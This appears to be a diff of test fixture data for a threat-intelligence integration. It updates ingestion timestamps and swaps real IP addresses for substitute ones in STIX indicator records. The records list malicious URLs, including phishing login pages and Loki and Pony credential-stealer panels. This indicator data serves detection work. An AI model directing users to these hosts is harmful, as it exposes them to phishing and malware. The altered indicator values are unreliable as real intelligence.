@@ -26746,7 +26746,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388549598Z", + "ingested": "2021-12-13T08:38:40.025995100Z", "original": "{\"created\":\"2020-02-22T02:54:29.634Z\",\"description\":\"TS ID: 55335562505; iType: mal_url; State: active; Org: ChunkHost; Source: CyberCrime\",\"id\":\"indicator--2b38be23-b226-460e-9b17-4480e930f271\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-22T02:54:29.634Z\",\"name\":\"mal_url: http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://almondmilkoils.com/E6OCF8w8IPI6vxKa/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:29.634Z\"}", "category": "threat", "type": "indicator", @@ -26798,7 +26798,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388553625Z", + "ingested": "2021-12-13T08:38:40.025999300Z", "original": "{\"created\":\"2020-02-22T02:54:29.689Z\",\"description\":\"TS ID: 55335562500; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--0bfd644c-62ef-4f03-9d1d-304673d912f1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-22T02:54:29.689Z\",\"name\":\"mal_url: http://pay-robokassa.net/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://pay-robokassa.net/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:29.689Z\"}", "category": "threat", "type": "indicator", 
@@ -26850,7 +26850,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388558294Z", + "ingested": "2021-12-13T08:38:40.026002700Z", "original": "{\"created\":\"2020-02-22T02:54:47.42Z\",\"description\":\"TS ID: 55335562476; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--a15df968-dec6-4122-811e-1144011d0653\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:54:47.42Z\",\"name\":\"mal_url: http://nortonlilly.info/jb/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/jb/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:47.42Z\"}", "category": "threat", "type": "indicator", @@ -26869,7 +26869,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://185.70.185.34/host/admin.php", + "name": "mal_url: http://89.160.20.156/host/admin.php", "description": "TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime", "modified": "2020-02-22T02:54:48.824Z", "valid_from": "2020-02-22T02:54:48.824Z", 
@@ -26894,16 +26894,16 @@ "url": { "path": "/host/admin.php", "extension": "php", - "original": "http://185.70.185.34/host/admin.php", + "original": "http://89.160.20.156/host/admin.php", "scheme": "http", - "domain": "185.70.185.34", - "full": "http://185.70.185.34/host/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/host/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388562462Z", - "original": "{\"created\":\"2020-02-22T02:54:48.824Z\",\"description\":\"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime\",\"id\":\"indicator--11fec449-039c-4d64-aefa-210e96074633\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-40\"],\"modified\":\"2020-02-22T02:54:48.824Z\",\"name\":\"mal_url: http://185.70.185.34/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.70.185.34/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:48.824Z\"}", + "ingested": "2021-12-13T08:38:40.026007500Z", + "original": "{\"created\":\"2020-02-22T02:54:48.824Z\",\"description\":\"TS ID: 55335562428; iType: mal_url; State: active; Org: Hostkey B.v.; Source: CyberCrime\",\"id\":\"indicator--11fec449-039c-4d64-aefa-210e96074633\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-40\"],\"modified\":\"2020-02-22T02:54:48.824Z\",\"name\":\"mal_url: http://89.160.20.156/host/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/host/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:48.824Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -26954,7 +26954,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.388566730Z", + "ingested": "2021-12-13T08:38:40.026014500Z", "original": "{\"created\":\"2020-02-22T02:54:49.84Z\",\"description\":\"TS ID: 55335562466; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--5d04eb73-cda3-4f22-bcaf-604660d26343\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:54:49.84Z\",\"name\":\"mal_url: http://nortonlilly.info/ace1/st/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/ace1/st/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:49.84Z\"}", "category": "threat", "type": "indicator", @@ -26973,7 +26973,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://94.100.18.4/primfive/logs/omc.php", + "name": "mal_url: http://89.160.20.156/primfive/logs/omc.php", "description": "TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime", "modified": "2020-02-22T02:54:51.052Z", "valid_from": "2020-02-22T02:54:51.052Z", 
@@ -26998,16 +26998,16 @@ "url": { "path": "/primfive/logs/omc.php", "extension": "php", - "original": "http://94.100.18.4/primfive/logs/omc.php", + "original": "http://89.160.20.156/primfive/logs/omc.php", "scheme": "http", - "domain": "94.100.18.4", - "full": "http://94.100.18.4/primfive/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/primfive/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.388571008Z", - "original": "{\"created\":\"2020-02-22T02:54:51.052Z\",\"description\":\"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-22T02:54:51.052Z\",\"name\":\"mal_url: http://94.100.18.4/primfive/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://94.100.18.4/primfive/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.052Z\"}", + "ingested": "2021-12-13T08:38:40.026018700Z", + "original": "{\"created\":\"2020-02-22T02:54:51.052Z\",\"description\":\"TS ID: 55335562498; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--f7bafcb3-679f-4959-8ed0-d3d8b62eceef\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-22T02:54:51.052Z\",\"name\":\"mal_url: http://89.160.20.156/primfive/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primfive/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.052Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27058,7 +27058,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389400114Z", + "ingested": "2021-12-13T08:38:40.026047100Z", "original": "{\"created\":\"2020-02-22T02:54:51.08Z\",\"description\":\"TS ID: 55335562469; iType: mal_url; State: active; Org: Alicloud-us; Source: CyberCrime\",\"id\":\"indicator--4913d346-5153-40a6-b5ab-9854e91f4ac6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-91\"],\"modified\":\"2020-02-22T02:54:51.08Z\",\"name\":\"mal_url: http://allenservice.ga/~zadmin/lmark/gold/uMc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://allenservice.ga/~zadmin/lmark/gold/uMc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:51.08Z\"}", "category": "threat", "type": "indicator", @@ -27110,7 +27110,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389407739Z", + "ingested": "2021-12-13T08:38:40.026050900Z", "original": "{\"created\":\"2020-02-22T02:54:57.998Z\",\"description\":\"TS ID: 55335562501; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--abd1ec0d-3831-4ae8-93fd-fa22ed4d20fd\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-69\"],\"modified\":\"2020-02-22T02:54:57.998Z\",\"name\":\"mal_url: http://dronius267.myjino.ru/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://dronius267.myjino.ru/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:57.998Z\"}", "category": "threat", "type": "indicator", 
@@ -27162,7 +27162,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389412688Z", + "ingested": "2021-12-13T08:38:40.026056Z", "original": "{\"created\":\"2020-02-22T02:54:58.082Z\",\"description\":\"TS ID: 55335562493; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--21a62996-f4f5-4b77-be5d-4f84a7e7d084\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-22T02:54:58.082Z\",\"name\":\"mal_url: http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://aladebtrading.com/loki/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:58.082Z\"}", "category": "threat", "type": "indicator", @@ -27181,7 +27181,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.88/primsix/logs/omc.php", + "name": "mal_url: http://89.160.20.156/primsix/logs/omc.php", "description": "TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-22T02:54:59.268Z", "valid_from": "2020-02-22T02:54:59.268Z", 
@@ -27206,16 +27206,16 @@ "url": { "path": "/primsix/logs/omc.php", "extension": "php", - "original": "http://193.142.59.88/primsix/logs/omc.php", + "original": "http://89.160.20.156/primsix/logs/omc.php", "scheme": "http", - "domain": "193.142.59.88", - "full": "http://193.142.59.88/primsix/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/primsix/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.389417176Z", - "original": "{\"created\":\"2020-02-22T02:54:59.268Z\",\"description\":\"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-22T02:54:59.268Z\",\"name\":\"mal_url: http://193.142.59.88/primsix/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.88/primsix/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.268Z\"}", + "ingested": "2021-12-13T08:38:40.026077900Z", + "original": "{\"created\":\"2020-02-22T02:54:59.268Z\",\"description\":\"TS ID: 55335562496; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--7f70004c-d9ab-4f22-b3d8-511682528ccc\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-22T02:54:59.268Z\",\"name\":\"mal_url: http://89.160.20.156/primsix/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primsix/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.268Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27266,7 +27266,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389530810Z", + "ingested": "2021-12-13T08:38:40.026084300Z", "original": "{\"created\":\"2020-02-22T02:54:59.71Z\",\"description\":\"TS ID: 55335562514; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--0c36d9c7-4938-49c0-9704-38aeaee90f95\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:54:59.71Z\",\"name\":\"mal_url: http://worldatdoor.in/nato/Pony/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/nato/Pony/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:54:59.71Z\"}", "category": "threat", "type": "indicator", @@ -27318,7 +27318,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389554945Z", + "ingested": "2021-12-13T08:38:40.026090200Z", "original": "{\"created\":\"2020-02-22T02:55:06.175Z\",\"description\":\"TS ID: 55335562464; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--af30a658-0eea-4daf-b26f-26f060e56bc9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:06.175Z\",\"name\":\"mal_url: http://nortonlilly.info/jp/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/jp/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:06.175Z\"}", "category": "threat", "type": "indicator", 
@@ -27370,7 +27370,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389561768Z", + "ingested": "2021-12-13T08:38:40.026118500Z", "original": "{\"created\":\"2020-02-22T02:55:16.703Z\",\"description\":\"TS ID: 55335562478; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--6c50747b-39c8-48c7-9fdc-86427a702ce1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:55:16.703Z\",\"name\":\"mal_url: http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/lewis1/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:16.703Z\"}", "category": "threat", "type": "indicator", @@ -27421,7 +27421,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389566767Z", + "ingested": "2021-12-13T08:38:40.026122900Z", "original": "{\"created\":\"2020-02-22T02:55:26.13Z\",\"description\":\"TS ID: 55335562507; iType: mal_url; State: active; Org: QuadraNet; Source: CyberCrime\",\"id\":\"indicator--a2d5be60-5ee7-4dc6-b626-f5af241f2da0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-45\"],\"modified\":\"2020-02-22T02:55:26.13Z\",\"name\":\"mal_url: http://67.215.224.144/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://67.215.224.144/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:26.13Z\"}", "category": "threat", "type": "indicator", 
@@ -27473,7 +27473,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389570925Z", + "ingested": "2021-12-13T08:38:40.026127400Z", "original": "{\"created\":\"2020-02-22T02:55:32.068Z\",\"description\":\"TS ID: 55335562512; iType: mal_url; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--d1c9a2c5-972d-4de3-97b5-c8175e4a0c4c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-22T02:55:32.068Z\",\"name\":\"mal_url: http://abyng.com/mg/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://abyng.com/mg/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:32.068Z\"}", "category": "threat", "type": "indicator", @@ -27492,7 +27492,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 192.64.118.182", + "name": "mal_ip: 192.168.118.182", "description": "TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime", "modified": "2020-02-22T02:55:34.073Z", "valid_from": "2020-02-22T02:55:34.073Z", 
@@ -27514,12 +27514,12 @@ "first_seen": "2020-02-22T02:55:34.073Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "192.64.118.182" + "ip": "192.168.118.182" } }, "event": { - "ingested": "2021-12-13T05:57:34.389575113Z", - "original": "{\"created\":\"2020-02-22T02:55:34.073Z\",\"description\":\"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:34.073Z\",\"name\":\"mal_ip: 192.64.118.182\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.64.118.182']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:34.073Z\"}", + "ingested": "2021-12-13T08:38:40.026132600Z", + "original": "{\"created\":\"2020-02-22T02:55:34.073Z\",\"description\":\"TS ID: 55335562503; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--bb1eb654-4bcc-4292-a65d-879efac8ff18\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-22T02:55:34.073Z\",\"name\":\"mal_ip: 192.168.118.182\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.118.182']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:34.073Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27537,7 +27537,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.141.24.100", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime", "modified": "2020-02-22T02:55:37.882Z", "valid_from": "2020-02-22T02:55:37.882Z", 
@@ -27559,12 +27559,12 @@ "first_seen": "2020-02-22T02:55:37.882Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.141.24.100" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.389578910Z", - "original": "{\"created\":\"2020-02-22T02:55:37.882Z\",\"description\":\"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-22T02:55:37.882Z\",\"name\":\"mal_ip: 185.141.24.100\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.141.24.100']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:37.882Z\"}", + "ingested": "2021-12-13T08:38:40.026136700Z", + "original": "{\"created\":\"2020-02-22T02:55:37.882Z\",\"description\":\"TS ID: 55335562427; iType: mal_ip; State: active; Org: Host Sailor Ltd.; Source: CyberCrime\",\"id\":\"indicator--fdcefce4-18b5-4a39-9b8d-a8816fe4c411\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-02-22T02:55:37.882Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:37.882Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27615,7 +27615,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389582958Z", + "ingested": "2021-12-13T08:38:40.026142600Z", "original": "{\"created\":\"2020-02-22T02:55:50.468Z\",\"description\":\"TS ID: 55335562509; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--8358dddf-0d73-48e3-b8cd-14dc1ba01c09\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-22T02:55:50.468Z\",\"name\":\"mal_url: http://d0lphin1337.xyz/autofarm/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://d0lphin1337.xyz/autofarm/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:50.468Z\"}", "category": "threat", "type": "indicator", @@ -27667,7 +27667,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389586664Z", + "ingested": "2021-12-13T08:38:40.026164900Z", "original": "{\"created\":\"2020-02-22T02:55:52.759Z\",\"description\":\"TS ID: 55335562480; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--f1deba70-4cd9-42a2-877f-9036b38c72b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-22T02:55:52.759Z\",\"name\":\"mal_url: http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://worldatdoor.in/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-22T02:55:52.759Z\"}", "category": "threat", "type": "indicator", 
@@ -27686,7 +27686,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://94.100.18.11/plugman/logs/omc.php", + "name": "mal_url: http://89.160.20.156/plugman/logs/omc.php", "description": "TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime", "modified": "2020-02-23T02:51:55.106Z", "valid_from": "2020-02-23T02:51:55.106Z", 
@@ -27711,16 +27711,16 @@ "url": { "path": "/plugman/logs/omc.php", "extension": "php", - "original": "http://94.100.18.11/plugman/logs/omc.php", + "original": "http://89.160.20.156/plugman/logs/omc.php", "scheme": "http", - "domain": "94.100.18.11", - "full": "http://94.100.18.11/plugman/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/plugman/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.389590391Z", - "original": "{\"created\":\"2020-02-23T02:51:55.106Z\",\"description\":\"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--516caba2-8889-4f32-96e6-e4874a705085\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:51:55.106Z\",\"name\":\"mal_url: http://94.100.18.11/plugman/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://94.100.18.11/plugman/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.106Z\"}", + "ingested": "2021-12-13T08:38:40.026170200Z", + "original": "{\"created\":\"2020-02-23T02:51:55.106Z\",\"description\":\"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--516caba2-8889-4f32-96e6-e4874a705085\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:51:55.106Z\",\"name\":\"mal_url: http://89.160.20.156/plugman/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/plugman/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.106Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -27771,7 +27771,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389593808Z", + "ingested": "2021-12-13T08:38:40.026174Z", "original": "{\"created\":\"2020-02-23T02:51:55.126Z\",\"description\":\"TS ID: 55342497247; iType: mal_url; State: active; Org: Clax Telecom Srl; Source: CyberCrime\",\"id\":\"indicator--7ad4e7c7-e202-4d04-8bae-c717d36610e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-100\"],\"modified\":\"2020-02-23T02:51:55.126Z\",\"name\":\"mal_url: http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.126Z\"}", "category": "threat", "type": "indicator", @@ -27823,7 +27823,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389597855Z", + "ingested": "2021-12-13T08:38:40.026179500Z", "original": "{\"created\":\"2020-02-23T02:52:00.436Z\",\"description\":\"TS ID: 55342497248; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--015e9665-1524-4e79-841d-8038961e0250\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:52:00.436Z\",\"name\":\"mal_url: http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:00.436Z\"}", "category": "threat", "type": "indicator", 
@@ -27875,7 +27875,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389697853Z", + "ingested": "2021-12-13T08:38:40.026209200Z", "original": "{\"created\":\"2020-02-23T02:52:11.479Z\",\"description\":\"TS ID: 55342497260; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--457f24b0-3aff-4e1b-972b-80bbc70de290\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:52:11.479Z\",\"name\":\"mal_url: http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:11.479Z\"}", "category": "threat", "type": "indicator", @@ -27927,7 +27927,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389706670Z", + "ingested": "2021-12-13T08:38:40.026213400Z", "original": "{\"created\":\"2020-02-23T02:52:31.664Z\",\"description\":\"TS ID: 55342497257; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; 